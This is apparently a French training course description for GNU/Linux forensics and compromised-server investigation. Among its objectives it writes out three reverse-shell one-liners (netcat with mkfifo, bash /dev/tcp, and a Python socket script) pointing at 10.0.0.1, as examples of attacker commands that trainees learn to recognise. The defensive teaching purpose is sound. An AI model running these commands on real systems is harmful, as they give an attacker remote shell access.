Objectifs

A l’issue de la formation, les stagiaires doivent être en mesure :

• De maîtriser le système d’exploitation GNU/Linux (connaissance approfondie du fonctionnement de GNU/Linux de l’arborescence, des services, des applications présentes par défaut) ;
• De savoir faire une analyse forensique d’un système GNU/Linux cible de type ordinateur de particuliers ;
• De connaître différentes techniques d’analyse permettant de traiter un serveur compromis (analyse de logs, analyse d’artefacts, etc.)
• D’être en mesure de comprendre des enchaînements de commandes utilisés par les attaquants ; par exemple :
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
  • bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  • python -c ‘import socket, subprocess, os;                                                        \

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);              \

s.connect((« 10.0.0.1 »,1234));                                                                \

os.dup2(s.fileno(),0);                                                                               \

os.dup2(s.fileno(),1);                                                                               \

os.dup2(s.fileno(),2);                                                                               \

p=subprocess.call([« /bin/sh », »-i »]);’